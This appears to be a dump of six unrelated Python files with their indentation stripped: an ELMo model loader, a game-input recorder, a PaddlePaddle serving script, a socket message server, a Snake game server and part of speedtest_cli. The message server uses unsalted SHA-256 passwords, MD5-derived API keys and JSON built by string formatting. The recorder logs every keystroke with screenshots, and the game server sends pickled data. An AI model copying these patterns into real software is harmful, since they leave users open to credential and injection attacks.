ELMo_to_last_updated = {}
cloud = CloudConnection.get_cloud_connection()
def __init__(self):
pass
@staticmethod
def __fetch_remote_model(file_name):
try:
ELMoFactory.__logger.info("fetching remote model {}".format(file_name))
if file_name in ELMoFactory.ELMo_to_status and ELMoFactory.ELMo_to_status[file_name] == FileStatus.Fetching:
return
ELMoFactory.ELMo_to_status[file_name] = FileStatus.Fetching
if os.path.exists((ELMoFactory.__RESOURCE_PATH / file_name).resolve()):
os.remove((ELMoFactory.__RESOURCE_PATH / file_name).resolve())
success = ELMoFactory.cloud.get_file(CloudConnection.remote_models_path + "/" + file_name,
(ELMoFactory.__RESOURCE_PATH / file_name).resolve())
if success:
ELMoFactory.ELMo_to_status[file_name] = FileStatus.Ready
ELMoFactory.ELMo_to_last_updated[file_name] = ELMoFactory.__fetch_remote_model_update_time(file_name)
if file_name in ELMoFactory.ELMo_models_cache:
del ELMoFactory.ELMo_models_cache[file_name]
ELMoFactory.__logger.info("successfully loaded remote model {}".format(file_name))
else:
del ELMoFactory.ELMo_to_status[file_name]
ELMoFactory.__logger.info("model {} was not found remotely".format(file_name))
except owncloud.HTTPResponseError:
del ELMoFactory.ELMo_to_status[file_name]
ELMoFactory.__logger.error("unable to load model {}".format(file_name))
@staticmethod
def __fetch_remote_model_update_time(file_name):
try:
info = ELMoFactory.cloud.file_info(CloudConnection.remote_models_path + "/" + file_name)
if info is not None:
ELMoFactory.__logger.info("successfully loaded metadata of model {}".format(file_name))
return info.get_last_modified()
else:
ELMoFactory.__logger.info("model {} was not found remotely".format(file_name))
except owncloud.HTTPResponseError:
ELMoFactory.__logger.error("unable to load metadata of model {}".format(file_name))
return None
@staticmethod
def __update_model(file_name):
if ELMoFactory.ELMo_to_last_updated[file_name] != ELMoFactory.__fetch_remote_model_update_time(file_name):
ELMoFactory.__fetch_remote_model(file_name)
@staticmethod
def __course_id_to_file_name(course_id):
file_name = "weights_course_{}.hdf5".format(course_id)
if file_name not in ELMoFactory.ELMo_to_status:
thr = threading.Thread(target=ELMoFactory.__fetch_remote_model, args=(file_name,))
thr.start()
return ELMoFactory.__DEFAULT_WEIGHT_FILE
if ELMoFactory.ELMo_to_status[file_name] == FileStatus.Ready and \
(ELMoFactory.__RESOURCE_PATH / file_name).resolve().exists():
thr = threading.Thread(target=ELMoFactory.__update_model, args=(file_name,))
thr.start()
return file_name
return ELMoFactory.__DEFAULT_WEIGHT_FILE
def get_model_for_course(self, course_id=None):
if course_id is None:
model_name = self.__DEFAULT_WEIGHT_FILE
else:
model_name = ELMoFactory.__course_id_to_file_name(course_id)
if model_name not in ELMoFactory.ELMo_models_cache:
weights_path = (self.__RESOURCE_PATH / model_name).resolve()
try:
ELMoFactory.ELMo_models_cache[model_name] = ElmoEmbedder(ELMoFactory.__OPTIONS_PATH, weights_path)
except FileNotFoundError:
self.__logger.error("Model not found, Using default elmo model")
return ElmoEmbedder(ELMoFactory.__OPTIONS_PATH, self.__DEFAULT_WEIGHT_FILE)
self.__logger.info("Using the ELMo Model {}".format(model_name))
return ELMoFactory.ELMo_models_cache[model_name]
|
create_dataset.py | """
This file will create a dataset of images and labels for training.
Author: Arda Mavi
"""
import os
import time
from multiprocessing import Process
import numpy as np
from PIL import Image
from mss import mss
from pynput.keyboard import Listener as key_listener
from pynput.mouse import Listener as mouse_listener
from game_control import get_id
from get_dataset import save_img
def get_screenshot():
"""
This function will get the screenshot of the game.
:return: num_array of the screenshot
"""
with mss() as sct:
monitor = sct.monitors[1]
sct_img = sct.grab(monitor)
# Convert to PIL/Pillow Image
img = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')
img = np.array(img)[:, :, :3] # Get first 3 channel from image as numpy array.
# resize it with PIL, because scipy.misc.imresize is deprecated.
img = Image.fromarray(img)
img = img.resize((img.size[0] * 4, img.size[1] * 4), resample=Image.BICUBIC)
# img = imresize(img, (150, 150, 3)).astype('float32') / 255.
return img
def save_event_keyboard(data_path, event, key):
"""
This function will save the event of the keyboard.
:param data_path: path to save the event
:param event: down or up
:param key: which key is pressed
"""
key = get_id(key)
if key != 1000:
data_path = data_path + '/-1,-1,{0},{1},{2}'.format(event, key, time.time())
screenshot = get_screenshot()
save_img(data_path, screenshot)
def save_event_mouse(data_path, x_coordinate, y_coordinate, button, pressed):
"""
This function will save the event of the mouse.
:param data_path: path to save the event
:param x_coordinate: x coordinate
:param y_coordinate: y coordinate
"""
# 539,996,0,0,1643879876.0606766
# 539 x coordinate
# 996 y coordinate
# 1643879876.0606766 time since epoch
# button is an enum
# cut button at dot and keep the last part.
button = button.name.split('.')[-1]
data_path = data_path + '/{0},{1},{2},{3},{4}'.format(x_coordinate, y_coordinate, button, int(pressed),
time.time())
screenshot = get_screenshot()
save_img(data_path, screenshot)
def listen_mouse():
"""
This function will listen the mouse and save the event.
:return: None
"""
data_path = 'Data/Train_Data/Mouse'
if not os.path.exists(data_path):
os.makedirs(data_path)
def on_click(x_coordinate, y_coordinate, button, pressed):
"""
This function will get the x and y coordinate of the mouse, when a click happens.
:param x_coordinate: int
:param y_coordinate: int
:TODO: fix the function. Help from: https://pynput.readthedocs.io/en/latest/mouse.html
"""
print(data_path, x_coordinate, y_coordinate, button, pressed)
save_event_mouse(data_path, x_coordinate, y_coordinate, button, pressed)
def on_scroll(x_cord, y_cord, dx, dy):
"""
This function will get the new x and y coordinate of the mouse, when a scroll happens.
dx and dy are the amount of scrolling.
:param x_cord: int
:param y_cord: int
:param dx: int
:param dy: int
:return: None
"""
pass
def on_move(x_cord, y_cord):
"""
This function will get the new x and y coordinate of the mouse, when a move happens.
If this callback raises an exception, or returns False, the mouse tracking will be stopped.
:param x_cord: int
:param y_cord: int
:return: None
"""
pass
with mouse_listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as listener:
listener.join()
def listen_keyboard():
"""
This function will listen the keyboard and save the event.
:return: None
"""
data_path = 'Data/Train_Data/Keyboard'
if not os.path.exists(data_path):
os.makedirs(data_path)
def on_press(key):
save_event_keyboard(data_path, 1, key)
def on_release(key):
save_event_keyboard(data_path, 2, key)
with key_listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
def main():
"""
This is the main function.
"""
dataset_path = 'Data/Train_Data/'
if not os.path.exists(dataset_path):
os.makedirs(dataset_path)
# Start to listening mouse with new process:
Process(target=listen_mouse, args=()).start()
listen_keyboard()
if __name__ == '__main__':
main()
|
serve.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with one line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
from flask import Flask, request
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"--thread", type=int, default=2, help="Concurrency of server")
parser.add_argument(
"--port", type=int, default=9292, help="Port of the starting gpu")
parser.add_argument(
"--device", type=str, default="gpu", help="Type of device")
parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids")
parser.add_argument(
"--model", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--name", type=str, default="None", help="Default service name")
parser.add_argument(
"--use_mkl", default=False, action="store_true", help="Use MKL")
parser.add_argument(
"--precision",
type=str,
default="fp32",
help="precision mode(fp32, int8, fp16, bf16)")
parser.add_argument(
"--use_calib",
default=False,
action="store_true",
help="Use TensorRT Calibration")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_encryption_model",
default=False,
action="store_true",
help="Use encryption model")
parser.add_argument(
"--use_multilang",
default=False,
action="store_true",
help="Use Multi-language-service")
parser.add_argument(
"--use_trt", default=False, action="store_true", help="Use TensorRT")
parser.add_argument(
"--use_lite", default=False, action="store_true", help="Use PaddleLite")
parser.add_argument(
"--use_xpu", default=False, action="store_true", help="Use XPU")
parser.add_argument(
"--product_name",
type=str,
default=None,
help="product_name for authentication")
parser.add_argument(
"--container_id",
type=str,
default=None,
help="container_id for authentication")
return parser.parse_args()
def start_standard_model(serving_port): # pylint: disable=doc-string-missing
args = serve_args()
thread_num = args.thread
model = args.model
port = serving_port
workdir = args.workdir
device = args.device
mem_optim = args.mem_optim_off is False
ir_optim = args.ir_optim
max_body_size = args.max_body_size
use_mkl = args.use_mkl
use_encryption_model = args.use_encryption_model
use_multilang = args.use_multilang
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(model):
infer_op_name = "general_infer"
#Temporary support for OCR model,it will be completely revised later
#If you want to use this, C++ server must compile with WITH_OPENCV option.
if len(model) == 2 and idx == 0 and model[0] == 'ocr_det_model':
infer_op_name = "general_detection"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
server = None
if use_multilang:
server = serving.MultiLangServer()
else:
server = serving.Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.use_mkl(use_mkl)
server.set_max_body_size(max_body_size)
server.set_port(port)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.use_encryption_model(use_encryption_model)
if args.product_name != None:
server.set_product_name(args.product_name)
if args.container_id != None:
server.set_container_id(args.container_id)
server.load_model_config(model)
server.prepare_server(workdir=workdir, port=port, device=device)
server.run_server()
def start_gpu_card_model(index, gpuid, port, args): # pylint: disable=doc-string-missing
workdir = args.workdir
gpuid = int(gpuid)
device = "gpu"
if gpuid == -1:
device = "cpu"
elif gpuid >= 0:
port = port + index
thread_num = args.thread
model = args.model
mem_optim = args.mem_optim_off is False
ir_optim = args.ir_optim
use_mkl = args.use_mkl
max_body_size = args.max_body_size
use_multilang = args.use_multilang
if gpuid >= 0:
workdir = "{}_{}".format(args.workdir, gpuid)
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(model):
infer_op_name = "general_infer"
if len(model) == 2 and idx == 0:
infer_op_name = "general_detection"
else:
infer_op_name = "general_infer"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
if use_multilang:
server = serving.MultiLangServer()
else:
server = serving.Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.use_mkl(use_mkl)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_max_body_size(max_body_size)
if args.use_trt:
server.set_trt()
if args.use_lite:
server.set_lite()
server.set_device(device)
if args.use_xpu:
server.set_xpu()
if args.product_name != None:
server.set_product_name(args.product_name)
if args.container_id != None:
server.set_container_id(args.container_id)
server.load_model_config(model)
server.prepare_server(
workdir=workdir,
port=port,
device=device,
use_encryption_model=args.use_encryption_model)
if gpuid >= 0:
server.set_gpuid(gpuid)
server.run_server()
def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing
gpus = ""
if serving_port == None:
serving_port = args.port
if args.gpu_ids == "":
gpus = []
else:
gpus = args.gpu_ids.split(",")
if "CUDA_VISIBLE_DEVICES" in os.environ:
env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
for ids in gpus:
if int(ids) >= len(env_gpus):
print(
" Max index of gpu_ids out of range, the number of CUDA_VISIBLE_DEVICES is {}."
.format(len(env_gpus)))
exit(-1)
else:
env_gpus = []
if args.use_lite:
print("run using paddle-lite.")
start_gpu_card_model(-1, -1, serving_port, args)
elif len(gpus) <= 0:
print("gpu_ids not set, going to run cpu service.")
start_gpu_card_model(-1, -1, serving_port, args)
else:
gpu_processes = []
for i, gpu_id in enumerate(gpus):
p = Process(
target=start_gpu_card_model,
args=(
i,
gpu_id,
serving_port,
args, ))
gpu_processes.append(p)
for p in gpu_processes:
p.start()
for p in gpu_processes:
p.join()
class MainService(BaseHTTPRequestHandler):
def get_available_port(self):
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
return default_port + i
def start_serving(self):
start_multi_card(args, serving_port)
def get_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "wb") as f:
f.write(key)
return True
def check_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "rb") as f:
cur_key = f.read()
if key != cur_key:
return False
return True
def start(self, post_data):
post_data = json.loads(post_data.decode('utf-8'))
global p_flag
if not p_flag:
if args.use_encryption_model:
print("waiting key for model")
if not self.get_key(post_data):
print("not found key in request")
return False
global serving_port
global p
serving_port = self.get_available_port()
p = Process(target=self.start_serving)
p.start()
time.sleep(3)
if p.is_alive():
p_flag = True
else:
return False
else:
if p.is_alive():
if not self.check_key(post_data):
return False
else:
return False
return True
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if self.start(post_data):
response = {"endpoint_list": [serving_port]}
else:
response = {"message": "start serving failed"}
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(response).encode())
if __name__ == "__main__":
args = serve_args()
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
if args.name == "None":
from .web_service import port_is_available
if args.use_encryption_model:
p_flag = False
p = None
serving_port = 0
server = HTTPServer(('localhost', int(args.port)), MainService)
print(
'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
)
server.serve_forever()
else:
start_multi_card(args)
else:
from .web_service import WebService
web_service = WebService(name=args.name)
web_service.load_model_config(args.model)
gpu_ids = args.gpu_ids
if gpu_ids == "":
if "CUDA_VISIBLE_DEVICES" in os.environ:
gpu_ids = os.environ["CUDA_VISIBLE_DEVICES"]
if len(gpu_ids) > 0:
web_service.set_gpus(gpu_ids)
web_service.prepare_server(
workdir=args.workdir,
port=args.port,
device=args.device,
use_lite=args.use_lite,
use_xpu=args.use_xpu,
ir_optim=args.ir_optim,
thread_num=args.thread,
precision=args.precision,
use_calib=args.use_calib)
web_service.run_rpc_service()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
web_service._launch_web_service()
service_name = "/" + web_service.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return web_service.get_prediction(request)
app_instance.run(host="0.0.0.0",
port=web_service.port,
threaded=False,
processes=4)
|
m_server.py | '''
## MESSAGE SERVER 1.0
##
## The simple messaging server can be installed on any machine
## It's main function is to receive, route and send messages to users
## It also allows users to create accounts, complete with password authentication
## Finally, it stores the public keys used for End to End encryption.
## Uses a json api to perform actions
## Logged messages are indecipherable to all except the communicating parties
##
## Author: Shimpano Mutangama
'''
import socket
import select
import threading
import time
import json
import sqlite3
import hashlib
class Message:
def __init__(self,message,sender,receipient):
self.message = message
self.sender = sender
self.receipient = receipient
self.time = time.time()
def time_str(self):
current_time_epoch = self.time
time_format = '%Y/%m/%d %H:%M:%S'
return time.strftime(time_format,time.localtime(current_time_epoch))
def json(self):
json_string = '{"message":"%s", "sender":"%s", "receipient":"%s", "date":"%s","success":true,"type":"message"}'%(self.message,self.sender,self.receipient,self.time_str())
return json_string
class MessageServer:
def __init__(self):
self._connections = {}
self.INPUTS = []
self.OUTPUTS = []
self._message_queues = {}
self._message_queue = []
self.server_socket = None
def _init_database(self):
#Create database and tables
self._conn = sqlite3.connect('message_server.db')
self._cursor = self._conn.cursor()
self._cursor.execute("CREATE TABLE IF NOT EXISTS messages (id INTEGER PRIMARY KEY NOT NULL, message varchar(200), sender varchar(200), receipient varchar(200), date varchar(200), read INTEGER)")
self._cursor.execute("CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY NOT NULL, username varchar(200),password varchar(200),api_key varchar(200),public_rsa varchar(2000))")
self._conn.commit()
self._conn.close()
def start(self):
self._init_database()
t = threading.Thread(target = self.listen_for_connections)
t.daemon = True
t.start()
time.sleep(5)
while True:
choice = raw_input(">>")
if len(choice) > 0:
print "Shutdown..."
for connection in self._connections:
self._connections[connection].shutdown(0)
self._connections[connection].close()
break
def listen_for_connections(self):
SERVER_HOST = '0.0.0.0'
SERVER_PORT = 1000
SERVER_TUPLE = (SERVER_HOST,SERVER_PORT)
self.server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.server_socket.bind(SERVER_TUPLE)
self.server_socket.listen(5)
#self.server_socket.settimeout(5)
self._connections['server_socket'] = self.server_socket
self.INPUTS.append(self.server_socket)
ERROR_SOCKETS = []
while True:
print "Listening for connections...\n"
read_sockets,write_sockets,error_sockets = select.select(self.INPUTS,[],[])
for sock in read_sockets:
if sock == self.server_socket:
client_connection,client_address = self.server_socket.accept()
print "Connected: ",client_address
data = client_connection.recv(1024)
response = self.parse_data(data)
client_connection.sendall(response)
json_response = json.loads(response)
if json_response["success"] == True:
client_id = json_response["username"]
self._connections[client_id] = client_connection
#client_connection.setblocking(0)
self.INPUTS.append(client_connection)
print "%s connected"%(client_id)
else:
print"Login or Registration Failed"
else:
try:
self.receive_messages(sock)
#self.INPUTS.remove(sock)
except:
#raise
error_sockets.append(sock)
print"Added an error socket"
for sock in error_sockets:
sock.close()
self.INPUTS.remove(sock)
def parse_data(self,data):
print "Request: %s"%data
json_data = json.loads(data)
#print"JSON received: %s"%json_data
if json_data["type"] == "registration":
response = self.register_user(json_data)
elif json_data["type"] == "login":
response = self.login_user(json_data)
return response
def check_user_api_key(self, username, key):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
check_key_sql = 'SELECT * FROM users WHERE username=? AND api_key=?'
records = cursor.execute(check_key_sql,(username,key))
count = 0
for record in records:
count+=1
conn.close()
if count == 0:
return False
else:
return True
def register_user(self,json_data):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
username = json_data["username"]
password = json_data["password"]
password_hash = hashlib.sha256(password).hexdigest()
public_rsa = json_data["public_key"]
user_kvp = "%s:%s"%(username,password)
api_key = "AK"+hashlib.md5(user_kvp).hexdigest()[::-1]
check_user_exists_sql = 'SELECT * FROM users WHERE username=?'
records = cursor.execute(check_user_exists_sql,(username,))
count = 0
for user in records:
count+=1
if count > 0:
response_json = '{"success":false,"reason":"username already registered."}'
else:
registration_sql = 'INSERT INTO users (username,password,api_key,public_rsa) VALUES (?,?,?,?)'
try:
cursor.execute(registration_sql,(username,password_hash,api_key,public_rsa))
response_json = '{"username":"%s","api_key":"%s","success":true}'%(username,api_key)
except:
response_json = '{"success":false,"reason":"failed."}'
conn.commit()
conn.close()
return response_json
def login_user(self,json_data):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
username = json_data["username"]
password = json_data["password"]
password_hash = hashlib.sha256(password).hexdigest()
login_sql = 'SELECT username,api_key FROM users WHERE username=? AND password=?'
user = cursor.execute(login_sql,(username,password_hash)).fetchone()
print"User Object: ",user
if user is not None:
response_json = '{"username":"%s","api_key":"%s","success":true}'%(user[0],user[1])
else:
response_json = '{"success":false,"reason":"incorrect login details."}'
conn.close()
return response_json
def receive_messages(self,client_socket):
while True:
try:
chunk= client_socket.recv(1024)
#print"First chunk received"
data = ''
while chunk:
if chunk[-2:] == "/0":
data+=chunk[:-2]
break
data+=chunk
chunk = client_socket.recv(1024)
#print"Request Received"
print"Received: ",data
request = json.loads(data)
logged_user = request["logged_user"]
api_key = request["api_key"]
#Check if user is using the right api key
authorized = self.check_user_api_key(logged_user,api_key)
if authorized:
if request["type"] == "message":
message = self.parse_message_data(data)
self.send_message(message)
elif request["type"] == "file":
try:
receipient = request["receipient"]
receipient_socket = self._connections[receipient]
receipient_socket.sendall(json.dumps(request)+"/0")
chunk = client_socket.recv(1024)
while chunk:
if chunk[-5:] == "/0end":
receipient_socket.send(chunk)
break
receipient_socket.send(chunk)
chunk = client_socket.recv(1024)
client_socket.sendall('{"message":"File Successfully Sent","type":"alert","success":true}')
client_socket.send("/0")
except:
raise
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(response)
client_socket.send("/0")
client_socket.settimeout(None)
elif request["type"] == "unread":
logged_user = request["logged_user"]
response = self.fetch_unread_messages(logged_user)
self.read_messages(logged_user)
json_response = json.dumps(response)
if response == 'fail':
json_response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(json_response)
client_socket.send("/0")
elif request["type"] == "publickey":
response = self.fetch_public_key(request["username"])
if response == 'fail':
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
#print"Key Response: %s"%response
client_socket.sendall(response)
client_socket.send("/0")
elif request["type"] == "sharedkey":
try:
receipient_socket = self._connections[request["receipient"]]
receipient_socket.sendall(json.dumps(request))
receipient_socket.send("/0")
except:
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(response)
client_socket.send("/0")
else:
response = '{"message":"Failed to Send... You are not authorized.","type":"alert","success":false}'
self.client_socket.sendall(response)
self.client_socket.send("/0")
except:
raise
break
def parse_message_data(self,data):
#print "Data Received: %s"%data
message_data = json.loads(data)
message_text = message_data["message"]
sender = message_data["sender"]
receipient = message_data["receipient"]
message = Message(message_text,sender,receipient)
return message
def user_exists(self,username):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
user_exists_sql = 'SELECT * FROM users WHERE username=?'
records = cursor.execute(user_exists_sql,(username,))
count = 0
for record in records:
count+=1
conn.close()
if count == 0:
return False
else:
return True
def send_message(self,message):
try:
if self.user_exists(message.receipient):
self.save_message(message)
receipient_socket = self._connections[message.receipient]
sender_socket = self._connections[message.sender]
receipient_socket.sendall(message.json())
receipient_socket.send("/0")
sender_socket.sendall('{"message":"Message Successfully Sent","type":"alert","success":true}')
sender_socket.send("/0")
self.read_messages(message.receipient)
except:
#raise
sender_socket = self._connections[message.sender]
if self.user_exists(message.receipient):
sender_socket.sendall('{"message":"Message Successfully Sent","type":"alert","success":true}')
else:
sender_socket.sendall('{"message":"Failed to Send","type":"alert","success":false}')
sender_socket.send("/0")
def save_message(self,message):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
read = 0 #False
save_message_sql = 'INSERT INTO messages (message,sender,receipient,date,read) VALUES (?,?,?,?,?)'
cursor.execute(save_message_sql,(message.message,message.sender,message.receipient,message.time_str(),read))
conn.commit()
conn.close()
except:
raise
def read_messages(self,username):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
read_sql = 'UPDATE messages SET read=1 WHERE receipient=? AND read=0'
cursor.execute(read_sql,(username,))
conn.commit()
conn.close()
except:
print "Something in the SQL"
raise
def fetch_unread_messages(self,username):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
fetch_unread_sql = 'SELECT message,sender,receipient,date FROM messages WHERE receipient=? AND read=0'
unread_messages = cursor.execute(fetch_unread_sql,(username,))
objects = []
for message in unread_messages:
message_dict = {}
message_dict['message'] = message[0]
message_dict['sender'] = message[1]
message_dict['receipient'] = message[2]
message_dict['date'] = message[3]
objects.append(message_dict)
conn.close()
response = {}
response['count'] = len(objects)
response['objects'] = objects
response['receipient'] = username
response['success'] = True
response["type"] = "unread"
except:
raise
response == "fail"
return response
#Public Key
def fetch_public_key(self,username):
try:
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
public_key_sql = 'SELECT username,public_rsa FROM users WHERE username=?'
records = cursor.execute(public_key_sql,(username,))
key_record = records.fetchone()
if key_record is not None:
json_response = '{"username":"%s","public_key":"%s","type":"publickey"}'%(key_record[0],key_record[1].replace("\n","\\n"))
else:
json_response = 'fail'
conn.commit()
conn.close()
return json_response
except:
return "fail"
def main():
global server
server = MessageServer()
server.start()
if __name__=="__main__":
main()
|
server.py | import Snake
import time
import json
import pickle
import threading
import socket
# select level
with open('levels/level.json') as f:
world = json.load(f)
env = Snake.environment(19, 11, repeat = True, world = world, tilesize = 50)
players = {}
debugging = False
s = socket.socket()
s.bind(('', 65231))
s.listen(10)
def debug(*msg):
if debugging:
print(*msg)
def listen_for_connections(lock):
global players
while True:
print("listening...")
conn, addr = s.accept() # handles connections
print(f"got connection: {conn}, {addr}")
conn.setblocking(True)
newsnake = Snake.snake(-4,5,3)
debug("listen_for_connections: acquiring")
with lock:
debug("listen_for_connections: acquired")
conn.send(pickle.dumps(env)) # send world and initial state data to new player
players[conn] = newsnake
threading.Thread(target=handle_client_rqsts, args=(conn, newsnake, lock)).start() # start a new rqsts handler
debug(env.snakes, players[conn])
debug("listen_for_connections: released")
s.close()
print("Server stopped listening.")
def handle_client_rqsts(conn, snk, lock):
global players
print("New thread started.")
while True:
try:
rqst = conn.recv(16).decode()
except ConnectionAbortedError:
continue
except ConnectionResetError:
continue
debug("handle_client_rqsts: acquiring")
with lock:
debug("handle_client_rqsts: acquired")
# parse request
if rqst == 'LEAVE':
try:
env.rmsnake(snk)
except ValueError:
pass
del players[conn]
conn.sendall('LEFT'.encode())
conn.close()
break
elif rqst == 'JOIN':
if not snk in env.snakes:
snk.reset(0,5,5)
env.addsnake(snk)
print(env.snakes)
elif rqst == 'ML':
snk.changedir(1)
elif rqst == 'MR':
snk.changedir(0)
elif rqst == 'MU':
snk.changedir(2)
elif rqst == 'MD':
snk.changedir(-1)
debug("handle_client_rqsts: released")
print("Player left. Lock released.")
def update_loop(lock):
global players
while True:
debug("update_loop: acquiring")
with lock:
debug("update_loop: acquired")
env.update()
data = pickle.dumps((env.snakes, env.foods))
header = len(data).to_bytes(4, 'little')
try:
for player in players:
player.sendall(header)
for player in players:
player.sendall(data)
except ConnectionAbortedError:
pass
debug(data)
debug("update_loop: released")
time.sleep(0.1) # update game world and send status every .1 seconds
def start():
lock = threading.Lock()
t1 = threading.Thread(target=listen_for_connections, args=(lock,)) # handles new connections
t2 = threading.Thread(target=update_loop, args=(lock,)) # updates game loop and sends results
t1.start()
t2.start()
print("started")
start()
|
speedtest_cli.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.0'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
